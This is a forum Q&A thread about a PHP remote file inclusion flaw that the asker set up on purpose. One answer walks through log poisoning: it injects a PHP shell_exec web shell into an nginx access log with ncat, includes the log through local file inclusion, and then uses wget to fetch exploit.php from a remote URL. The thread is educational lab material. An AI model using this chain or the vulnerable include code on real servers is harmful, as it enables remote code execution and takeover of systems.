Simple Remote File Inclusion vulnerability not working?

Question

So I've hosted a php file vulnerable to RFI with code like this:

<?php

echo include($_GET['page']);

?>

However,when I try to exploit the code by vsiting http://192.168.8.133/test.php?page=http://download850.mediafireuserdownload.com/w7tl7lq5agug/iwmmm0do3h6txy1/test.php, no php codes get executed. Am i missing something here? Or does apache2 have a configuration that prevents fetching of resources from external domains? LFI works perfectly fine though. But shouldn't RFI work as well with a simple code like that?

The file that I am trying to include has the following code:

<?php   
    echo 1;
?>

Answer 1

The allow_url_include is off for most of the hosts you will encounter. When you cannot use RFI (Remote File Inclusion) you could always try LFI (Local File Inclusion). The point is that you need to get some code stored on the server to execute.

If you have access to the logs you could try to inject PHP in the logs. A simple way is to connect via ncat to inject strings into the logs.

For HTTPS:

ncat -nvv --ssl hostname 443

Then it waits for input. As an example you could enter the following:

<?php echo shell_exec($_REQUEST['cmd'] ?>

In the logs you would see the bad request you send to the webserver.

==> /var/log/nginx/access.log <==
xx.xx.xx.xx - - [28/Apr/2017:09:21:31 +0200] "<?php echo shell_exec($_REQUEST['cmd'] ?>" 400 173 "-" "-"

If you now include this logfile where you tried to include the URL, you might be able to download your URL using wget with something like the next request:

http://192.168.8.133/test.php?page=/var/log/nginx/access.log&cmd=wget%20http://url-to-download/exploit.php

This will only work if the host has not disabled the shell_exec() command, but this is less common then allow_url_include=0

Answer 2

I realised that the settings in my php.ini file has "allow_url_include=0" which prevents remote urls from being included even when there is not filter in place for the php code.